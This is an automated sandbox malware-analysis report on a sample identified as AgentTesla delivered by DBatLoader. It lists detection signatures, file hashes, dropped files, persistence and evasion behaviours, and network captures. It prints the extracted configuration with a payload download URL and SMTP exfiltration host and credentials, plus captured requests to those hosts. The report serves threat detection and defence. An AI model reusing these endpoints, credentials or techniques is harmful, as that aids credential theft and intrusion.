Windows Analysis Report
2jbMIxCFsK.exe

Overview

General Information

Sample name: 2jbMIxCFsK.exe
renamed because original name is a hash value
Original sample name: 054899796d592bb5f70b0a9fa28429024a919270a76603626be24068faae59d9.exe
Analysis ID: 1562866
MD5: 67dac6ae9ee770115db85cc71979dc41
SHA1: a708539ebb312329f56f064a8491e4c6e1bd7ce8
SHA256: 054899796d592bb5f70b0a9fa28429024a919270a76603626be24068faae59d9
Tags: doganalecmdexeuser-JAMESWT_MHT
Infos:

Detection

AgentTesla, DBatLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected AgentTesla
Yara detected DBatLoader
.NET source code contains very large strings
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Allocates many large memory junks
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to register a low level keyboard hook
Drops PE files to the user root directory
Drops PE files with a suspicious file extension
Drops executable to a common third party application directory
Drops or copies cmd.exe with a different name (likely to bypass HIPS)
Infects executable files (exe, dll, sys, html)
Installs a global keyboard hook
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sample uses process hollowing technique
Sigma detected: DLL Search Order Hijackig Via Additional Space in Path
Sigma detected: Execution from Suspicious Folder
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to check if a connection to the internet is available
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to query locales information (e.g. system language)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: Suspicious Schtasks From Env Var Folder
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Name Description Attribution Blogpost URLs Link
Agent Tesla, AgentTesla A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
 https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
Name Description Attribution Blogpost URLs Link
DBatLoader This Delphi loader misuses Cloud storage services, such as Google Drive to download the Delphi stager component. The Delphi stager has the actual payload embedded as a resource and starts it. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: 2jbMIxCFsK.exe Avira: detected
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Avira: detection malicious, Label: TR/Spy.Gen8
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Avira: detection malicious, Label: HEUR/AGEN.1311721
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Avira: detection malicious, Label: HEUR/AGEN.1311721
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Avira: detection malicious, Label: HEUR/AGEN.1325995
Found malware configuration
Source: 2jbMIxCFsK.exe Malware Configuration Extractor: DBatLoader {"Download Url": ["https://gxe0.com/yak/233_Wisrysxlfss"]}
Source: 9.0.neworigin.exe.240000.0.unpack Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "s82.gocheapweb.com", "Username": "info2@j-fores.com", "Password": "london@1759"}
Multi AV Scanner detection for dropped file
Source: C:\Users\Public\Libraries\Wisrysxl.PIF ReversingLabs: Detection: 57%
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe ReversingLabs: Detection: 81%
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe ReversingLabs: Detection: 91%
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe ReversingLabs: Detection: 91%
Multi AV Scanner detection for submitted file
Source: 2jbMIxCFsK.exe ReversingLabs: Detection: 57%
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 99.9% probability
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Joe Sandbox ML: detected
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Joe Sandbox ML: detected
Machine Learning detection for sample
Source: 2jbMIxCFsK.exe Joe Sandbox ML: detected
Uses 32bit PE files
Source: 2jbMIxCFsK.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Source: unknown HTTPS traffic detected: 198.252.105.91:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.5:49736 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.5:49752 version: TLS 1.2
Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: 2jbMIxCFsK.exe, 00000000.00000003.2122962525.000000007ED80000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2229949049.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF87000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\DCB\CBT_Main\BuildResults\bin\Win32\Release\armsvc.pdb source: lxsyrsiW.pif, 00000008.00000003.2167425399.000000002BD60000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: easinvoker.pdb source: 2jbMIxCFsK.exe, 2jbMIxCFsK.exe, 00000000.00000002.2202959804.0000000020D67000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2175050035.0000000002E8E000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2122962525.000000007ED80000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2229949049.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2050057116.000000007FC50000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2202959804.0000000020CC3000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2050539495.000000007F920000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF87000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2166786184.0000000002226000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: cmd.pdbUGP source: esentutl.exe, 00000004.00000003.2139143163.0000000005050000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: ping.pdbGCTL source: esentutl.exe, 00000005.00000003.2144839901.0000000004A20000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: easinvoker.pdbH source: 2jbMIxCFsK.exe, 00000000.00000003.2122962525.000000007ED80000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2229949049.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF87000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: easinvoker.pdbGCTL source: 2jbMIxCFsK.exe, 00000000.00000002.2202959804.0000000020D67000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2175050035.0000000002E8E000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2143795019.000000002226F000.00000004.00000020.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2143795019.000000002223E000.00000004.00000020.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2173838479.0000000002C28000.00000004.00000020.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2050057116.000000007FC50000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2202959804.0000000020CC3000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2050539495.000000007F920000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2050268749.0000000002C2C000.00000004.00000020.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2166786184.0000000002226000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: cmd.pdb source: esentutl.exe, 00000004.00000003.2139143163.0000000005050000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: ping.pdb source: esentutl.exe, 00000005.00000003.2144839901.0000000004A20000.00000004.00001000.00020000.00000000.sdmp

Spreading
barindex
Infects executable files (exe, dll, sys, html)
Source: C:\Users\Public\Libraries\lxsyrsiW.pif System file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Code function: 0_2_02E65908 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA, 0_2_02E65908
Source: C:\Users\Public\Libraries\lxsyrsiW.pif File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\
Source: C:\Users\Public\Libraries\lxsyrsiW.pif File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\
Source: C:\Users\Public\Libraries\lxsyrsiW.pif File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\
Source: C:\Users\Public\Libraries\lxsyrsiW.pif File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\
Source: C:\Users\Public\Libraries\lxsyrsiW.pif File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\
Source: C:\Users\Public\Libraries\lxsyrsiW.pif File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Code function: 4x nop then jmp 028B7394h 10_2_028B7108
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Code function: 4x nop then jmp 028B78DCh 10_2_028B767A
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h 10_2_028B7E60
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h 10_2_028B7E5E
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Code function: 4x nop then jmp 065BBCBDh 15_2_065BBA40

Networking
barindex
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: https://gxe0.com/yak/233_Wisrysxlfss
Contains functionality to check if a connection to the internet is available
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Code function: 0_2_02E7E4B8 InternetCheckConnectionA, 0_2_02E7E4B8
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.5:49707 -> 51.195.88.199:587
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 198.252.105.91 198.252.105.91
Source: Joe Sandbox View IP Address: 104.26.13.205 104.26.13.205
Source: Joe Sandbox View IP Address: 104.26.13.205 104.26.13.205
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
May check the online IP address of the machine
Source: unknown DNS query: name: api.ipify.org
Source: unknown DNS query: name: api.ipify.org
Suricata IDS alerts with low severity for network traffic
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49705 -> 198.252.105.91:443
Uses SMTP (mail sending)
Source: global traffic TCP traffic: 192.168.2.5:49707 -> 51.195.88.199:587
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /yak/233_Wisrysxlfss HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: gxe0.com
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /yak/233_Wisrysxlfss HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: gxe0.com
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic DNS traffic detected: DNS query: gxe0.com
Source: global traffic DNS traffic detected: DNS query: pywolwnvd.biz
Source: global traffic DNS traffic detected: DNS query: api.ipify.org
Source: global traffic DNS traffic detected: DNS query: s82.gocheapweb.com
Source: 2jbMIxCFsK.exe, 00000000.00000003.2122962525.000000007ED80000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2229949049.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF87000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: 2jbMIxCFsK.exe, 00000000.00000003.2122962525.000000007ED80000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2229949049.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF87000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: 2jbMIxCFsK.exe, 00000000.00000003.2122962525.000000007ED80000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2229949049.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF87000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: 2jbMIxCFsK.exe, 00000000.00000003.2122962525.000000007ED80000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2229949049.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF87000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: 2jbMIxCFsK.exe, 00000000.00000003.2122962525.000000007ED80000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2229949049.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF87000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0
Source: 2jbMIxCFsK.exe, 00000000.00000003.2122962525.000000007ED80000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2229949049.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF87000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
Source: 2jbMIxCFsK.exe, 00000000.00000003.2122962525.000000007ED80000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2229949049.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF87000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: 2jbMIxCFsK.exe, 00000000.00000003.2122962525.000000007ED80000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2229949049.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF87000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: 2jbMIxCFsK.exe, 00000000.00000003.2122962525.000000007ED80000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2229949049.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF87000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: 2jbMIxCFsK.exe, 00000000.00000003.2122962525.000000007ED80000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2229949049.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF87000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#
Source: 2jbMIxCFsK.exe, 00000000.00000003.2122962525.000000007ED80000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2229949049.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF87000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
Source: powershell.exe, 0000000B.00000002.2278069246.0000000005C09000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: 2jbMIxCFsK.exe, 00000000.00000003.2122962525.000000007ED80000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2229949049.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF87000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0
Source: 2jbMIxCFsK.exe, 00000000.00000003.2122962525.000000007ED80000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2229949049.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF87000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0A
Source: 2jbMIxCFsK.exe, 00000000.00000003.2122962525.000000007ED80000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2229949049.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF87000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0C
Source: 2jbMIxCFsK.exe, 00000000.00000003.2122962525.000000007ED80000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2229949049.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF87000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0X
Source: 2jbMIxCFsK.exe, 00000000.00000003.2122962525.000000007ED80000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2229949049.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF87000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://ocsp.sectigo.com0
Source: 2jbMIxCFsK.exe, 00000000.00000003.2122962525.000000007ED80000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2229949049.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF87000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://ocsp.sectigo.com0C
Source: powershell.exe, 0000000B.00000002.2254342461.0000000004CF5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: neworigin.exe, 00000009.00000002.2419547129.0000000005DBE000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 00000009.00000002.2320882998.0000000000A97000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 00000009.00000002.2419547129.0000000005D61000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 00000009.00000002.2359317927.0000000002871000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 00000009.00000002.2359317927.00000000026E3000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 00000009.00000002.2417679749.0000000005D10000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 00000018.00000002.4530947899.0000000000D2E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://r11.i.lencr.org/0
Source: neworigin.exe, 00000009.00000002.2419547129.0000000005DBE000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 00000009.00000002.2320882998.0000000000A97000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 00000009.00000002.2419547129.0000000005D61000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 00000009.00000002.2359317927.0000000002871000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 00000009.00000002.2359317927.00000000026E3000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 00000009.00000002.2417679749.0000000005D10000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 00000018.00000002.4530947899.0000000000D2E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://r11.o.lencr.org0#
Source: neworigin.exe, 00000009.00000002.2359317927.0000000002871000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 00000009.00000002.2359317927.00000000026D9000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 00000018.00000002.4540086325.000000000290C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://s82.gocheapweb.com
Source: powershell.exe, 0000000B.00000002.2254342461.0000000004CF5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: neworigin.exe, 00000009.00000002.2359317927.0000000002661000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2254342461.0000000004BA1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000000B.00000002.2254342461.0000000004CF5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 0000000B.00000002.2254342461.0000000004CF5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2286081090.00000000075F7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 0000000B.00000002.2286081090.00000000075F7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.microsoft.
